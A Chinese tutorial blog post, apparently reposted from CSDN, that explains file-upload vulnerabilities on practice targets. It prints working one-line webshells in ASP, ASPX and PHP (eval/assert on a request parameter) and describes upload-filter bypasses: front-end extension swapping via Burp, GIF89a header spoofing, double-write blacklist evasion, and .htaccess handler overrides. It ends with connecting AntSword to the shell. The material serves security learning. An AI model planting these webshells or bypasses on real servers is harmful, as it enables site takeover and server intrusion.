本文介绍: 现代互联网的Web应用程序中,上传文件是一种常见功能,因为它有助于提高业务效率,如企业的OA系统,允许用户上传图片视频头像和许多其他类型文件。然而向用户提供的功能越多,Web应用受到攻击风险就越大,如果Web应用存在文件上传漏洞,那么恶意用户可以利用文件上传漏洞剑可执行脚本程序(WebShell)上传到服务器中,获得网站权限然后可以一步服务器进行入侵,扩大控制权限。

漏洞介绍

       现代互联网的Web应用程序中,上传文件是一种常见功能,因为它有助于提高业务效率,如企业的OA系统,允许用户上传图片视频头像和许多其他类型文件。然而向用户提供的功能越多,Web应用受到攻击风险就越大,如果Web应用存在文件上传漏洞,那么恶意用户就可以利用文件上传漏洞剑可执行脚本程序(WebShell)上传到服务器中,获得网站权限然后可以一步服务器进行入侵,扩大控制权限

漏洞利用

       非法用户可以利用上传的恶意脚本文件控制整个网站,甚至服务器这个恶意脚本文件,又被称为 WebShell,是以 ASP、PHP、JSP等网页设计语言编写网页脚本,通常也叫作网页后门攻击者入侵一个网站后,常会将 WebShell上传到网站的目录或者插入正常的网页中,然后使用浏览器或者对应的 WebShell客户端访问这些后门,将会得到一个命令执行环境,以达到控制网站服务器的目的。

一句话木马

     tips:这下面的木马蚁剑连接时候密码都为x

    ASP的一句话木马

1.   <%eval request(“x“)%>

2.   <%execuate request(“x“)%>

    ASPX的一句话木马

1.   <%@ Page Language=”Jscript“%>
      <%eval (Request.Item[“x“],”unsafe“);%)

    PHP的一句话木马

1.   <?php @eval($_POST[‘x‘]); ?>

2.   <?php assert($_POST[‘x‘]); ?>

漏洞实战样例

      1.JS前端绕过

靶场题目

此时我们上传一个一句话木马。

说明前端后缀.php的文件是黑名单
我们可以改为.jpg文件然后bp抓包,在包里面改为.php,因为此时我们已经通过前端验证

.jpg改为.php可以上传成功
上传成功了;

复制图片地址然后后缀改成.php


php代码执行成功

       2.文件头绕过

        文件上传时,服务器除了JS前端检验,有的检验还会对上传的文件进行文件头检测。文件头信息通常在一个文件的开头我们查看十六进制方式可以查看一个文件的文件头信息。这也是最方便、最快捷的用来辨别一个文件真实内容方法

常见的文件头标志如下

JPEG (jpg),文件头:FFD8FF
PNG (png),文件头:89504E47
GIF (gif),文件头:47494638
HTML (html),文件头:68746D6C3E
ZIP Archive (zip),文件头:504B0304
RAR Archive (rar),文件头:52617221
Adobe Acrobat (pdf),文件头:255044462D312E
MS Word/Excel (xls.or.doc),文件头:D0CF11E0

tips:一般图片文件我们都在前面加入GIF89a绕过

不加文件头的时候


加了文件头的时候

然后靶场实战吧!!!
同样先转为图片.jpg文件上传改包

上传成功了

          3.黑名单缺陷

       限制文件上传的方式千奇百怪,白名单黑名单就是常见的限制方式。白名单设置可以让用户上传的文件格式白名单以外的文件格式都不能通过。黑名单设置用户不能上传的文件格式黑名单以外的文件格式都能通过。所以在一般情况下,白名单黑名单限制的用户要更多一些。

上传.php文件会失败就是黑名单过滤

本题给了提示
会把黑名单里面字符串删掉然后继续拼接路径。这时候我们可以想到双写绕过
如;
php“被删掉变成””  什么没有
pphphp“,中间的php被删掉,然后前面的p和后面的hp合成新的php

就是双写绕过

这里我们.jpg改为.pphphp,后端遇到pphphp的时候会把它变成php

成功上传了

      4.  .htaccess文件

       .htaccess文件时Apache服务中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮助我们实现网页301重定向自定义404错误页面,改变文件扩展名、允许/阻止特定的用户或者目录访问,禁止目录列表配置默认文档等功能

       其中.htaccess文件内容SetHandler application/x-http-php的意思是设置当前目录所有文件都使用php解析,那么无论上传任何文件,只要符合php语言代码规范,就会被当做PHP执行

       我们先把.htaccess文件上传上去,然后上传一个带有一句话木马的.jpg文件,当你访问.jpg文件时,这个文件会被当成php执行

我们的.htaccess文件根muma.jpg文件在一个目录下,我们访问muma.jpg文件看看

.htaccess适用范围比.user.ini小,他好像只能用于apache服务器上的,大家ctf题的时候可能遇到,我这里其实演示失败了….,但是过程就是这样的!!!

一句话木马的使用

       为什么现在才写一句话木马,因为你首先得会上传php文件是吧,不然上传的木马是个图片怎么用呢?

我喜欢用的一句话木马
tips:GIF89a可以绕过后端关于图片的一些验证phpinfo可以判断是否上传的文件可以按照php执行,会有回显

先上传成功木马先

然后用蚁剑连接

点击测试连接,如果连接成功的话点击添加

双击它我们就可以看到目标所有目录文件了

所以这就是一句话木马的危害

原文地址:https://blog.csdn.net/weixin_74790320/article/details/134818846

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任

如若转载,请注明出处:http://www.7code.cn/show_47614.html

如若内容造成侵权/违法违规/事实不符,请联系代码007邮箱suwngjj01@126.com进行投诉反馈,一经查实,立即删除

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注